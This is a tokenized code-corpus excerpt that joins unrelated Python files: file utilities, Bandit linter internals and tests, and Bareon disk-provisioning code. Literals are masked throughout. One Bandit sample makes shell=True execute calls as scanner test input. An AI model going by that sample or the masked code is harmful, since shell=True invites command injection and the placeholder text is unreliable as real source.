) : <EOL> if not isfile ( fn ) : <EOL> if not quiet : <EOL> LOG . debug ( "<STR_LIT>" , fn , file_size ) <EOL> mkdirslist ( dirname ( fn ) , tracewriter = tracewriter ) <EOL> with open ( fn , "<STR_LIT:w>" ) as fh : <EOL> fh . truncate ( file_size ) <EOL> if tracewriter : <EOL> tracewriter . file_touched ( fn ) <EOL> else : <EOL> if die_if_there : <EOL> msg = "<STR_LIT>" % ( fn ) <EOL> raise excp . FileException ( msg ) <EOL> def load_file ( fn ) : <EOL> with open ( fn , "<STR_LIT:rb>" ) as fh : <EOL> return fh . read ( ) <EOL> def mkdir ( path , recurse = True ) : <EOL> if not isdir ( path ) : <EOL> if recurse : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> os . makedirs ( path ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> os . mkdir ( path ) <EOL> return path <EOL> def deldir ( path ) : <EOL> if isdir ( path ) : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> shutil . rmtree ( path ) <EOL> def rmdir ( path , quiet = True ) : <EOL> if not isdir ( path ) : <EOL> return <EOL> try : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> os . rmdir ( path ) <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> except OSError : <EOL> if not quiet : <EOL> raise <EOL> else : <EOL> pass <EOL> def symlink ( source , link , force = True , tracewriter = None ) : <EOL> LOG . debug ( "<STR_LIT>" % ( link , source ) ) <EOL> mkdirslist ( dirname ( link ) , tracewriter = tracewriter ) <EOL> if force and ( exists ( link ) and islink ( link ) ) : <EOL> unlink ( link , True ) <EOL> os . symlink ( source , link ) <EOL> if tracewriter : <EOL> tracewriter . symlink_made ( link ) <EOL> def getuser ( ) : <EOL> ( uid , _gid ) = get_suids ( ) <EOL> if uid is None : <EOL> return getpass . getuser ( ) <EOL> return pwd . getpwuid ( uid ) . pw_name <EOL> def getuid ( username ) : <EOL> return pwd . getpwnam ( username ) . pw_uid <EOL> def gethomedir ( user = None ) : <EOL> if not user : <EOL> user = getuser ( ) <EOL> home_dir = os . path . expanduser ( "<STR_LIT>" % ( user ) ) <EOL> return home_dir <EOL> def getgid ( groupname ) : <EOL> return grp . getgrnam ( groupname ) . gr_gid <EOL> def getgroupname ( ) : <EOL> ( _uid , gid ) = get_suids ( ) <EOL> if gid is None : <EOL> gid = os . getgid ( ) <EOL> return grp . getgrgid ( gid ) . gr_name <EOL> def unlink ( path , ignore_errors = True ) : <EOL> LOG . debug ( "<STR_LIT>" % ( path ) ) <EOL> try : <EOL> os . unlink ( path ) <EOL> except OSError : <EOL> if not ignore_errors : <EOL> raise <EOL> else : <EOL> pass <EOL> def copy ( src , dst , tracewriter = None ) : <EOL> LOG . debug ( "<STR_LIT>" % ( src , dst ) ) <EOL> shutil . copy ( src , dst ) <EOL> if tracewriter : <EOL> tracewriter . file_touched ( dst ) <EOL> return dst <EOL> def move ( src , dst , force = False ) : <EOL> LOG . debug ( "<STR_LIT>" % ( src , dst ) ) <EOL> if force : <EOL> if isdir ( dst ) : <EOL> dst = joinpths ( dst , basename ( src ) ) <EOL> if isfile ( dst ) : <EOL> unlink ( dst ) <EOL> shutil . move ( src , dst ) <EOL> return dst <EOL> def write_file_and_backup ( path , contents , bk_ext = '<STR_LIT>' ) : <EOL> perms = None <EOL> backup_path = None <EOL> if isfile ( path ) : <EOL> perms = fileperms ( path ) <EOL> backup_path = "<STR_LIT>" % ( path , bk_ext ) <EOL> if not isfile ( backup_path ) : <EOL> LOG . debug ( "<STR_LIT>" , path , backup_path ) <EOL> move ( path , backup_path ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" , path , backup_path ) <EOL> write_file ( path , contents ) <EOL> if perms is not None : <EOL> chmod ( path , perms ) <EOL> return backup_path <EOL> def chmod ( fname , mode ) : <EOL> LOG . debug ( "<STR_LIT>" % ( fname , mode ) ) <EOL> os . chmod ( fname , mode ) <EOL> return fname <EOL> def got_root ( ) : <EOL> e_id = geteuid ( ) <EOL> g_id = getegid ( ) <EOL> for a_id in [ e_id , g_id ] : <EOL> if a_id != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def sleep ( winks ) : <EOL> if winks <= <NUM_LIT:0> : <EOL> return <EOL> time . sleep ( winks ) <EOL> def which_first ( bin_names , additional_dirs = None , ensure_executable = True ) : <EOL> assert bin_names , '<STR_LIT>' <EOL> for b in bin_names : <EOL> try : <EOL> return which ( b , <EOL> additional_dirs = additional_dirs , <EOL> ensure_executable = ensure_executable ) <EOL> except excp . FileException : <EOL> pass <EOL> bin_names = "<STR_LIT:U+002CU+0020>" . join ( bin_names ) <EOL> raise excp . FileException ( "<STR_LIT>" % bin_names ) <EOL> def which ( bin_name , additional_dirs = None , ensure_executable = True ) : <EOL> def check_it ( path ) : <EOL> if not path : <EOL> return False <EOL> if not isfile ( path ) : <EOL> return False <EOL> if ensure_executable and not os . access ( path , os . X_OK ) : <EOL> return False <EOL> return True <EOL> full_name = distutils . spawn . find_executable ( bin_name ) <EOL> if check_it ( full_name ) : <EOL> return full_name <EOL> if not additional_dirs : <EOL> additional_dirs = [ ] <EOL> for dir_name in additional_dirs : <EOL> full_name = joinpths ( dirname ( dirname ( abspth ( anvil . __file__ ) ) ) , <EOL> dir_name , <EOL> bin_name ) <EOL> if check_it ( full_name ) : <EOL> return full_name <EOL> raise excp . FileException ( "<STR_LIT>" % bin_name ) </s>
<s> from django . conf import urls <EOL> import openstack_dashboard . urls <EOL> urlpatterns = urls . patterns ( <EOL> '<STR_LIT>' , <EOL> urls . url ( r'<STR_LIT>' , urls . include ( openstack_dashboard . urls ) ) <EOL> ) </s>
<s> import logging <EOL> from bandit . core import utils <EOL> logger = logging . getLogger ( __name__ ) <EOL> def checks ( * args ) : <EOL> '''<STR_LIT>''' <EOL> def wrapper ( func ) : <EOL> if not hasattr ( func , "<STR_LIT>" ) : <EOL> func . _checks = [ ] <EOL> func . _checks . extend ( utils . check_ast_node ( a ) for a in args ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , func . _checks ) <EOL> return func <EOL> return wrapper <EOL> def takes_config ( * args ) : <EOL> '''<STR_LIT>''' <EOL> name = "<STR_LIT>" <EOL> def _takes_config ( func ) : <EOL> if not hasattr ( func , "<STR_LIT>" ) : <EOL> func . _takes_config = name <EOL> return func <EOL> if len ( args ) == <NUM_LIT:1> and callable ( args [ <NUM_LIT:0> ] ) : <EOL> name = args [ <NUM_LIT:0> ] . __name__ <EOL> return _takes_config ( args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> name = args [ <NUM_LIT:0> ] <EOL> return _takes_config <EOL> def test_id ( id_val ) : <EOL> '''<STR_LIT>''' <EOL> def _has_id ( func ) : <EOL> if not hasattr ( func , "<STR_LIT>" ) : <EOL> func . _test_id = id_val <EOL> return func <EOL> return _has_id <EOL> def accepts_baseline ( * args ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> if not hasattr ( func , '<STR_LIT>' ) : <EOL> func . _accepts_baseline = True <EOL> logger . debug ( '<STR_LIT>' , <EOL> func . __name__ ) <EOL> return func <EOL> return wrapper ( args [ <NUM_LIT:0> ] ) </s>
<s> r"""<STR_LIT>""" <EOL> import ast <EOL> import bandit <EOL> from bandit . core import test_properties as test <EOL> def gen_config ( name ) : <EOL> if name == '<STR_LIT>' : <EOL> return { '<STR_LIT>' : False } <EOL> @ test . takes_config <EOL> @ test . checks ( '<STR_LIT>' ) <EOL> @ test . test_id ( '<STR_LIT>' ) <EOL> def try_except_pass ( context , config ) : <EOL> node = context . node <EOL> if len ( node . body ) == <NUM_LIT:1> : <EOL> if ( not config [ '<STR_LIT>' ] and <EOL> node . type is not None and <EOL> getattr ( node . type , '<STR_LIT:id>' , None ) != '<STR_LIT>' ) : <EOL> return <EOL> if isinstance ( node . body [ <NUM_LIT:0> ] , ast . Pass ) : <EOL> return bandit . Issue ( <EOL> severity = bandit . LOW , <EOL> confidence = bandit . HIGH , <EOL> text = ( "<STR_LIT>" ) <EOL> ) </s>
<s> import utils <EOL> import utils as u <EOL> u . execute ( '<STR_LIT>' , shell = True ) <EOL> utils . execute ( '<STR_LIT>' , shell = True ) <EOL> u . execute_with_timeout ( '<STR_LIT>' , shell = True ) <EOL> utils . execute_with_timeout ( '<STR_LIT>' , shell = True ) <EOL> utils . execute_with_timeout ( [ '<STR_LIT>' , '<STR_LIT>' ] , shell = False ) </s>
<s> import csv <EOL> import tempfile <EOL> import six <EOL> import testtools <EOL> import bandit <EOL> from bandit . core import config <EOL> from bandit . core import issue <EOL> from bandit . core import manager <EOL> from bandit . formatters import csv as b_csv <EOL> class CsvFormatterTests ( testtools . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CsvFormatterTests , self ) . setUp ( ) <EOL> conf = config . BanditConfig ( ) <EOL> self . manager = manager . BanditManager ( conf , '<STR_LIT:file>' ) <EOL> ( tmp_fd , self . tmp_fname ) = tempfile . mkstemp ( ) <EOL> self . context = { '<STR_LIT:filename>' : self . tmp_fname , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : [ <NUM_LIT:4> ] } <EOL> self . check_name = '<STR_LIT>' <EOL> self . issue = issue . Issue ( bandit . MEDIUM , bandit . MEDIUM , <EOL> '<STR_LIT>' ) <EOL> self . manager . out_file = self . tmp_fname <EOL> self . issue . fname = self . context [ '<STR_LIT:filename>' ] <EOL> self . issue . lineno = self . context [ '<STR_LIT>' ] <EOL> self . issue . linerange = self . context [ '<STR_LIT>' ] <EOL> self . issue . test = self . check_name <EOL> self . manager . results . append ( self . issue ) <EOL> def test_report ( self ) : <EOL> b_csv . report ( self . manager , self . tmp_fname , self . issue . severity , <EOL> self . issue . confidence ) <EOL> with open ( self . tmp_fname ) as f : <EOL> reader = csv . DictReader ( f ) <EOL> data = six . next ( reader ) <EOL> self . assertEqual ( self . tmp_fname , data [ '<STR_LIT:filename>' ] ) <EOL> self . assertEqual ( self . issue . severity , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . issue . confidence , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . issue . text , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( six . text_type ( self . context [ '<STR_LIT>' ] ) , <EOL> data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( six . text_type ( self . context [ '<STR_LIT>' ] ) , <EOL> data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . check_name , data [ '<STR_LIT>' ] ) </s>
<s> class BaseError ( Exception ) : <EOL> def __init__ ( self , message , * args , ** kwargs ) : <EOL> self . message = message <EOL> super ( BaseError , self ) . __init__ ( message , * args , ** kwargs ) <EOL> class WrongInputDataError ( BaseError ) : <EOL> pass <EOL> class WrongPartitionSchemeError ( BaseError ) : <EOL> pass <EOL> class WrongPartitionPolicyError ( BaseError ) : <EOL> pass <EOL> class PartitionSchemeMismatchError ( BaseError ) : <EOL> pass <EOL> class HardwarePartitionSchemeCannotBeReadError ( BaseError ) : <EOL> pass <EOL> class WrongPartitionLabelError ( BaseError ) : <EOL> pass <EOL> class PartitionNotFoundError ( BaseError ) : <EOL> pass <EOL> class DiskNotFoundError ( BaseError ) : <EOL> pass <EOL> class NotEnoughSpaceError ( BaseError ) : <EOL> pass <EOL> class PVAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class PVNotFoundError ( BaseError ) : <EOL> pass <EOL> class PVBelongsToVGError ( BaseError ) : <EOL> pass <EOL> class VGAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class VGNotFoundError ( BaseError ) : <EOL> pass <EOL> class LVAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class LVNotFoundError ( BaseError ) : <EOL> pass <EOL> class MDAlreadyExistsError ( BaseError ) : <EOL> pass <EOL> class MDNotFoundError ( BaseError ) : <EOL> pass <EOL> class MDDeviceDuplicationError ( BaseError ) : <EOL> pass <EOL> class MDWrongSpecError ( BaseError ) : <EOL> pass <EOL> class MDRemovingError ( BaseError ) : <EOL> pass <EOL> class WrongConfigDriveDataError ( BaseError ) : <EOL> pass <EOL> class WrongImageDataError ( BaseError ) : <EOL> pass <EOL> class TemplateWriteError ( BaseError ) : <EOL> pass <EOL> class ProcessExecutionError ( BaseError ) : <EOL> def __init__ ( self , stdout = None , stderr = None , exit_code = None , cmd = None , <EOL> description = None ) : <EOL> self . exit_code = exit_code <EOL> self . stderr = stderr <EOL> self . stdout = stdout <EOL> self . cmd = cmd <EOL> self . description = description <EOL> if description is None : <EOL> description = ( "<STR_LIT>" ) <EOL> if exit_code is None : <EOL> exit_code = '<STR_LIT:->' <EOL> message = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % { '<STR_LIT:description>' : description , <EOL> '<STR_LIT>' : cmd , <EOL> '<STR_LIT>' : exit_code , <EOL> '<STR_LIT>' : stdout , <EOL> '<STR_LIT>' : stderr } <EOL> super ( ProcessExecutionError , self ) . __init__ ( message ) <EOL> class GrubUtilsError ( BaseError ) : <EOL> pass <EOL> class FsUtilsError ( BaseError ) : <EOL> pass <EOL> class HttpUrlConnectionError ( BaseError ) : <EOL> pass <EOL> class HttpUrlInvalidContentLength ( BaseError ) : <EOL> pass <EOL> class ImageChecksumMismatchError ( BaseError ) : <EOL> pass <EOL> class NoFreeLoopDevices ( BaseError ) : <EOL> pass <EOL> class WrongRepositoryError ( BaseError ) : <EOL> pass <EOL> class WrongDeviceError ( BaseError ) : <EOL> pass <EOL> class UnexpectedProcessError ( BaseError ) : <EOL> pass <EOL> class IncorrectChroot ( BaseError ) : <EOL> pass <EOL> class TooManyKernels ( BaseError ) : <EOL> pass </s>
<s> import copy <EOL> import six <EOL> import unittest2 <EOL> from oslo_config import cfg <EOL> from bareon . actions import partitioning <EOL> from bareon . drivers . data import nailgun <EOL> from bareon import objects <EOL> from bareon . tests import test_nailgun <EOL> if six . PY2 : <EOL> import mock <EOL> elif six . PY3 : <EOL> import unittest . mock as mock <EOL> CONF = cfg . CONF <EOL> class TestPartitioningAction ( unittest2 . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> return_value = { } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def setUp ( self , mock_lbd , mock_image_meta ) : <EOL> super ( TestPartitioningAction , self ) . setUp ( ) <EOL> mock_lbd . return_value = test_nailgun . LIST_BLOCK_DEVICES_SAMPLE <EOL> self . drv = nailgun . Nailgun ( test_nailgun . PROVISION_SAMPLE_DATA ) <EOL> self . action = partitioning . PartitioningAction ( self . drv ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> return_value = { } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> def test_do_partitioning_with_keep_data_flag ( self , mock_fu , mock_lbd , <EOL> mock_image_meta ) : <EOL> mock_lbd . return_value = test_nailgun . LIST_BLOCK_DEVICES_SAMPLE <EOL> data = copy . deepcopy ( test_nailgun . PROVISION_SAMPLE_DATA ) <EOL> for disk in data [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> for volume in disk [ '<STR_LIT>' ] : <EOL> if volume [ '<STR_LIT:type>' ] == '<STR_LIT>' and volume [ '<STR_LIT>' ] == '<STR_LIT:image>' : <EOL> volume [ '<STR_LIT>' ] = True <EOL> self . drv = nailgun . Nailgun ( data ) <EOL> self . action = partitioning . PartitioningAction ( self . drv ) <EOL> self . action . execute ( ) <EOL> mock_fu_mf_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_fu_mf_expected_calls , <EOL> mock_fu . make_fs . call_args_list ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> def test_do_partitioning_md ( self , mock_pu , mock_fu , mock_lu , mock_mu , <EOL> mock_utils , mock_os ) : <EOL> mock_os . path . exists . return_value = True <EOL> self . drv . partition_scheme . mds = [ <EOL> objects . MD ( '<STR_LIT>' , '<STR_LIT>' , devices = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) , <EOL> objects . MD ( '<STR_LIT>' , '<STR_LIT>' , devices = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) , <EOL> ] <EOL> self . action . execute ( ) <EOL> self . assertEqual ( [ mock . call ( '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:default>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT:default>' ) ] , <EOL> mock_mu . mdcreate . call_args_list ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch . object ( partitioning , '<STR_LIT>' , autospec = True ) <EOL> def test_do_partitioning ( self , mock_pu , mock_fu , mock_lu , mock_mu , <EOL> mock_utils , mock_os ) : <EOL> mock_os . path . exists . return_value = True <EOL> self . action . execute ( ) <EOL> mock_utils . unblacklist_udev_rules . assert_called_once_with ( <EOL> udev_rules_dir = '<STR_LIT>' , <EOL> udev_rename_substr = '<STR_LIT>' ) <EOL> mock_utils . blacklist_udev_rules . assert_called_once_with ( <EOL> udev_rules_dir = '<STR_LIT>' , <EOL> udev_rules_lib_dir = '<STR_LIT>' , <EOL> udev_empty_rule = '<STR_LIT>' , udev_rename_substr = '<STR_LIT>' ) <EOL> mock_pu_ml_expected_calls = [ mock . call ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_ml_expected_calls , <EOL> mock_pu . make_label . call_args_list ) <EOL> mock_pu_mp_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_mp_expected_calls , <EOL> mock_pu . make_partition . call_args_list ) <EOL> mock_pu_spf_expected_calls = [ mock . call ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_spf_expected_calls , <EOL> mock_pu . set_partition_flag . call_args_list ) <EOL> mock_pu_sgt_expected_calls = [ mock . call ( '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_pu_sgt_expected_calls , <EOL> mock_pu . set_gpt_type . call_args_list ) <EOL> mock_lu_p_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) , <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) , <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) , <EOL> mock . call ( '<STR_LIT>' , metadatasize = <NUM_LIT> , metadatacopies = <NUM_LIT:2> ) ] <EOL> self . assertEqual ( mock_lu_p_expected_calls , <EOL> mock_lu . pvcreate . call_args_list ) <EOL> mock_lu_v_expected_calls = [ mock . call ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT:image>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_lu_v_expected_calls , <EOL> mock_lu . vgcreate . call_args_list ) <EOL> mock_lu_l_expected_calls = [ mock . call ( '<STR_LIT>' , '<STR_LIT:root>' , <NUM_LIT> ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> mock . call ( '<STR_LIT:image>' , '<STR_LIT>' , <NUM_LIT> ) ] <EOL> self . assertEqual ( mock_lu_l_expected_calls , <EOL> mock_lu . lvcreate . call_args_list ) <EOL> mock_fu_mf_expected_calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> self . assertEqual ( mock_fu_mf_expected_calls , <EOL> mock_fu . make_fs . call_args_list ) </s>
<s> import os <EOL> import re <EOL> import stat <EOL> from bareon import errors <EOL> from bareon . openstack . common import log as logging <EOL> from bareon . utils import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> VALID_MAJORS = ( <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> UDEV_PROPERTIES = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> SMBIOS_TYPES = { '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> DISK = '<STR_LIT>' <EOL> PARTITION = '<STR_LIT>' <EOL> def parse_dmidecode ( type ) : <EOL> """<STR_LIT>""" <EOL> output = utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type ) <EOL> lines = output [ <NUM_LIT:0> ] . split ( '<STR_LIT:\n>' ) <EOL> info = [ ] <EOL> multiline_values = None <EOL> section = <NUM_LIT:0> <EOL> for line in lines : <EOL> if len ( line ) != <NUM_LIT:0> and len ( line . strip ( ) ) == len ( line ) : <EOL> info . append ( { } ) <EOL> section = len ( info ) - <NUM_LIT:1> <EOL> try : <EOL> k , v = ( l . strip ( ) for l in line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> except ValueError : <EOL> k = line . strip ( ) <EOL> if not k : <EOL> multiline_values = None <EOL> if multiline_values : <EOL> info [ section ] [ multiline_values ] . append ( k ) <EOL> else : <EOL> if not v : <EOL> multiline_values = k . lower ( ) <EOL> info [ section ] [ multiline_values ] = [ ] <EOL> else : <EOL> info [ section ] [ k . lower ( ) ] = v <EOL> return info <EOL> def parse_lspci ( ) : <EOL> """<STR_LIT>""" <EOL> output = utils . execute ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> lines = output [ <NUM_LIT:0> ] . split ( '<STR_LIT:\n>' ) <EOL> info = [ { } ] <EOL> section = <NUM_LIT:0> <EOL> for line in lines [ : - <NUM_LIT:2> ] : <EOL> try : <EOL> k , v = ( l . strip ( ) for l in line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> except ValueError : <EOL> info . append ( { } ) <EOL> section += <NUM_LIT:1> <EOL> else : <EOL> info [ section ] [ k . lower ( ) ] = v <EOL> return info <EOL> def parse_simple_kv ( * command ) : <EOL> """<STR_LIT>""" <EOL> output = utils . execute ( * command ) <EOL> lines = output [ <NUM_LIT:0> ] . split ( '<STR_LIT:\n>' ) <EOL> info = { } <EOL> for line in lines [ : - <NUM_LIT:1> ] : <EOL> try : <EOL> k , v = ( l . strip ( ) for l in line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) ) <EOL> except ValueError : <EOL> break <EOL> else : <EOL> info [ k . lower ( ) ] = v <EOL> return info <EOL> def is_disk ( dev , bspec = None , uspec = None ) : <EOL> """<STR_LIT>""" <EOL> if uspec is None : <EOL> uspec = udevreport ( dev ) <EOL> if uspec . get ( '<STR_LIT>' ) == '<STR_LIT:1>' : <EOL> return False <EOL> if uspec . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> return False <EOL> if '<STR_LIT>' in uspec and int ( uspec [ '<STR_LIT>' ] ) not in VALID_MAJORS : <EOL> return False <EOL> if bspec is None : <EOL> bspec = blockdevreport ( dev ) <EOL> if bspec . get ( '<STR_LIT>' ) == '<STR_LIT:1>' : <EOL> return False <EOL> return True <EOL> def udevreport ( dev ) : <EOL> """<STR_LIT>""" <EOL> report = utils . execute ( '<STR_LIT>' , <EOL> '<STR_LIT:info>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( dev ) , <EOL> check_exit_code = [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> spec = { } <EOL> for line in [ l for l in report . splitlines ( ) if l ] : <EOL> key , value = line . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> value = value . strip ( '<STR_LIT>' ) <EOL> if key == '<STR_LIT>' : <EOL> spec [ '<STR_LIT>' ] = value . split ( ) <EOL> if key in UDEV_PROPERTIES : <EOL> spec [ key ] = value <EOL> return spec <EOL> def blockdevreport ( blockdev ) : <EOL> """<STR_LIT>""" <EOL> cmd = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> blockdev <EOL> ] <EOL> opts = [ o [ <NUM_LIT:5> : ] for o in cmd if o . startswith ( '<STR_LIT>' ) ] <EOL> report = utils . execute ( * cmd , check_exit_code = [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> return dict ( zip ( opts , report . splitlines ( ) ) ) <EOL> def extrareport ( dev ) : <EOL> """<STR_LIT>""" <EOL> spec = { } <EOL> name = os . path . basename ( dev ) <EOL> try : <EOL> with open ( '<STR_LIT>' . format ( name ) ) as file : <EOL> spec [ '<STR_LIT>' ] = file . read ( ) . strip ( ) <EOL> except Exception : <EOL> pass <EOL> for key in ( '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> with open ( '<STR_LIT>' . format ( name , key ) ) as file : <EOL> spec [ key ] = file . read ( ) . strip ( ) <EOL> except Exception : <EOL> pass <EOL> return spec <EOL> def is_block_device ( filepath ) : <EOL> """<STR_LIT>""" <EOL> mode = os . stat ( filepath ) . st_mode <EOL> return stat . S_ISBLK ( mode ) <EOL> def scsi_address_list ( ) : <EOL> scsi_sg_path = '<STR_LIT>' <EOL> try : <EOL> scsi_devices = open ( 